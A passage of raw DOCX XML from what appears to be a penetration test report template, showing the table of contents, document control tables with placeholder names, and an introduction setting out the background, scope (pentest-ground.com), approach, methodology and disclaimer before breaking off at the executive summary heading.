              <w:instrText xml:space="preserve"> PAGEREF _Toc190270972 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>105</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="49D1CF37" w14:textId="2B76E310" w:rsidR="001257CD" w:rsidRDefault="001257CD">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="2"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-RO" w:eastAsia="en-GB"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc190270973" w:history="1">
            <w:r w:rsidRPr="00FE6E44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.1 Tools and techniques</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc190270973 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>105</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="35276857" w14:textId="1107516B" w:rsidR="00732DCB" w:rsidRDefault="00425689" w:rsidP="00352461">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="43DA9ACF" w14:textId="77777777" w:rsidR="00732DCB" w:rsidRDefault="00732DCB" w:rsidP="00D57DF8">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3471E2CC" w14:textId="77777777" w:rsidR="00595C26" w:rsidRDefault="007F5541" w:rsidP="006632EB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc190270966"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Document control</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="10167FA8" w14:textId="77777777" w:rsidR="00D57DF8" w:rsidRDefault="00D57DF8" w:rsidP="006435E7">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r w:rsidRPr="00DE4CB5">
        <w:t>Distribution list</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrayHeader"/>
        <w:tblW w:w="9026" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3008"/>
        <w:gridCol w:w="3009"/>
        <w:gridCol w:w="3009"/>
      </w:tblGrid>
      <w:tr w:rsidR="006435E7" w14:paraId="25B5C417" w14:textId="77777777" w:rsidTr="006435E7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3008" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>
          </w:tcPr>
          <w:p w14:paraId="4A2C17D0" w14:textId="77777777" w:rsidR="006435E7" w:rsidRDefault="006435E7" w:rsidP="00D02B07">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3008" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>
          </w:tcPr>
          <w:p w14:paraId="189A60DB" w14:textId="77777777" w:rsidR="006435E7" w:rsidRDefault="006435E7" w:rsidP="00D02B07">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3008" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>
          </w:tcPr>
          <w:p w14:paraId="75826050" w14:textId="77777777" w:rsidR="006435E7" w:rsidRDefault="006435E7" w:rsidP="00D02B07">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Representing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006435E7" w14:paraId="1085F370" w14:textId="77777777" w:rsidTr="006435E7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3008" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="493076E7" w14:textId="77777777" w:rsidR="006435E7" w:rsidRDefault="006435E7" w:rsidP="00D02B07">
            <w:r w:rsidRPr="00B67E62">
              <w:t>John Doe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3008" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="634E5FDF" w14:textId="77777777" w:rsidR="006435E7" w:rsidRDefault="006435E7" w:rsidP="00D02B07">
            <w:r w:rsidRPr="00B67E62">
              <w:t>Security Consultant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3008" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50C0D3B0" w14:textId="7F7FC1E1" w:rsidR="006435E7" w:rsidRDefault="005838D5" w:rsidP="00D02B07">
            <w:r>
              <w:t>Company Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006435E7" w14:paraId="11E25D1F" w14:textId="77777777" w:rsidTr="006435E7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3008" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DD8C3C2" w14:textId="77777777" w:rsidR="006435E7" w:rsidRDefault="006435E7" w:rsidP="00D02B07"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3008" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FDAF2E4" w14:textId="77777777" w:rsidR="006435E7" w:rsidRDefault="006435E7" w:rsidP="00D02B07"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3008" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DA519FB" w14:textId="77777777" w:rsidR="006435E7" w:rsidRDefault="006435E7" w:rsidP="00D02B07"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006435E7" w14:paraId="3F10649B" w14:textId="77777777" w:rsidTr="006435E7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3008" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="341B24D0" w14:textId="77777777" w:rsidR="006435E7" w:rsidRDefault="006435E7" w:rsidP="00D02B07"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3008" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="105FFC08" w14:textId="77777777" w:rsidR="006435E7" w:rsidRDefault="006435E7" w:rsidP="00D02B07"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3008" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D5488C9" w14:textId="77777777" w:rsidR="006435E7" w:rsidRDefault="006435E7" w:rsidP="00D02B07"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="72F06320" w14:textId="77777777" w:rsidR="006435E7" w:rsidRDefault="006435E7" w:rsidP="00D57DF8">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B17B425" w14:textId="77777777" w:rsidR="00D57DF8" w:rsidRDefault="00D57DF8" w:rsidP="006435E7">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r w:rsidRPr="00DE4CB5">
        <w:t>Revision history</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrayHeader"/>
        <w:tblW w:w="8970" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1415"/>
        <w:gridCol w:w="1555"/>
        <w:gridCol w:w="2505"/>
        <w:gridCol w:w="1290"/>
        <w:gridCol w:w="2205"/>
      </w:tblGrid>
      <w:tr w:rsidR="006435E7" w14:paraId="44187395" w14:textId="77777777" w:rsidTr="004D2ACE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1415" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>
          </w:tcPr>
          <w:p w14:paraId="2766AA1D" w14:textId="77777777" w:rsidR="006435E7" w:rsidRDefault="006435E7" w:rsidP="00D02B07">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>
          </w:tcPr>
          <w:p w14:paraId="2898D6A1" w14:textId="77777777" w:rsidR="006435E7" w:rsidRDefault="006435E7" w:rsidP="00D02B07">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2505" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>
          </w:tcPr>
          <w:p w14:paraId="0A6EABE5" w14:textId="77777777" w:rsidR="006435E7" w:rsidRDefault="006435E7" w:rsidP="00D02B07">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1290" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>
          </w:tcPr>
          <w:p w14:paraId="52C515A8" w14:textId="77777777" w:rsidR="006435E7" w:rsidRDefault="006435E7" w:rsidP="00D02B07">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>
          </w:tcPr>
          <w:p w14:paraId="6DDCA0F9" w14:textId="77777777" w:rsidR="006435E7" w:rsidRDefault="006435E7" w:rsidP="00D02B07">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Peer Review</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006435E7" w14:paraId="23C852E4" w14:textId="77777777" w:rsidTr="004D2ACE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1415" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7916F005" w14:textId="77777777" w:rsidR="006435E7" w:rsidRDefault="006435E7" w:rsidP="00D02B07">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0002E84E" w14:textId="77777777" w:rsidR="006435E7" w:rsidRDefault="006435E7" w:rsidP="00D02B07">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="00B67E62">
              <w:t>Feb 12, 2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2505" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A96AED0" w14:textId="77777777" w:rsidR="006435E7" w:rsidRDefault="006435E7" w:rsidP="00D02B07">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="00B67E62">
              <w:t>John Doe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1290" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51BD1710" w14:textId="77777777" w:rsidR="006435E7" w:rsidRDefault="006435E7" w:rsidP="00D02B07">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t>Draft</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E2A9CA5" w14:textId="77777777" w:rsidR="006435E7" w:rsidRDefault="006435E7" w:rsidP="00D02B07">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006435E7" w14:paraId="7AC72A29" w14:textId="77777777" w:rsidTr="004D2ACE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1415" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5720AC59" w14:textId="77777777" w:rsidR="006435E7" w:rsidRDefault="006435E7" w:rsidP="00D02B07">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B80C307" w14:textId="77777777" w:rsidR="006435E7" w:rsidRDefault="006435E7" w:rsidP="00D02B07">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2505" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35C69E36" w14:textId="77777777" w:rsidR="006435E7" w:rsidRDefault="006435E7" w:rsidP="00D02B07">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1290" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FB06013" w14:textId="77777777" w:rsidR="006435E7" w:rsidRDefault="006435E7" w:rsidP="00D02B07">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C62864E" w14:textId="77777777" w:rsidR="006435E7" w:rsidRDefault="006435E7" w:rsidP="00D02B07">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="45A96034" w14:textId="77777777" w:rsidR="00D57DF8" w:rsidRDefault="00D57DF8" w:rsidP="00D57DF8">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DDC87BB" w14:textId="77777777" w:rsidR="004749D0" w:rsidRDefault="004749D0" w:rsidP="00595C26"/>
    <w:p w14:paraId="604FC66E" w14:textId="77777777" w:rsidR="001B5544" w:rsidRDefault="001B5544" w:rsidP="00595C26"/>
    <w:p w14:paraId="6F7C5E52" w14:textId="77777777" w:rsidR="001B5544" w:rsidRDefault="001B5544" w:rsidP="00595C26"/>
    <w:p w14:paraId="113B735E" w14:textId="77777777" w:rsidR="001B5544" w:rsidRDefault="001B5544" w:rsidP="00595C26"/>
    <w:p w14:paraId="30C58F20" w14:textId="77777777" w:rsidR="001B5544" w:rsidRDefault="001B5544" w:rsidP="00595C26"/>
    <w:p w14:paraId="26109E63" w14:textId="77777777" w:rsidR="00280E01" w:rsidRDefault="00280E01" w:rsidP="00595C26"/>
    <w:p w14:paraId="6698F4AF" w14:textId="77777777" w:rsidR="00961D06" w:rsidRDefault="00961D06">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="64"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EFCAAC" w14:textId="77777777" w:rsidR="00595C26" w:rsidRDefault="00595C26" w:rsidP="004A5877">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc190270967"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="4E3EEDF1" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 Background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3B1F00" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>companie was contracted by SampleCompany Ltd to perform a penetration test on its Internet facing systems in order to determine the effectiveness of the implemented security measures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2124C7" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The test was agreed in the Contract No. SC340023 of 01 March 2020 between SampleCompany Ltd and companie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648CE811" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The fieldwork was completed between 15 April 2020 and 30 April 2020.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAFC519" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E28F94B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The objective of the penetration test was to evaluate the current state of the websites in scope from a security perspective and determine the risk of a successful attack by a malicious hacker or nefarious user from the Internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F08857" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>2.3 Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAB4021" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The following systems belonging to SampleCompany Ltd were in scope:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C8199D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrayHeader"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4680"/>
        <w:gridCol w:w="4680"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="0FE8BC0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058B7DE5" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53697635" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="2B068C5F" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E830EAB" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>https://pentest-ground.com:4280/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34D6AF0E" w14:textId="633DDB28" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7" w:rsidP="005838D5">
            <w:pPr>
              <w:ind w:left="720" w:hanging="720"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="5FE8F2AA" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3543DBA6" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>pentest-ground.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="074E3F8F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="06B259EC" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>2.4 Approach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0330775F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The penetration test was performed in a "black box" manner, meaning that we did not have any prior information about the target systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756039AC" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Our tests simulated an external threat (hacker, malicious user) located somewhere on the Internet who tried to find vulnerabilities in the target systems and exploit them in order to gain unauthorized access to sensitive information or affect the correct functionality of the systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0791643D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2.5 Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBF4004" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>All of our tests were performed by combining our professional experience with well known methodologies such as OWASP Top 10 and NIST 800-115.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1707BAB6" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>2.6 Disclaimer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E92A91E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Please note that it is impossible to test networks, information systems and people for every potential security vulnerability. This report does not form a guarantee that your assets are secure from all threats. The tests performed and their results are only from the point of view of companie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6EA4EF" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>companie is unable to ensure or guarantee that your assets are completely safe from any form of attack, including those that are not known at the time of the penetration test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBA5823" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Furthermore, any changes to the tested systems may have an impact on their security level either in a negative or positive way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD42589" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Our tests were performed in a time limited approach and our service was best-effort.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB0C50C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8433C1" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc190270968"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3. Executive summary</w:t>
      </w:r>
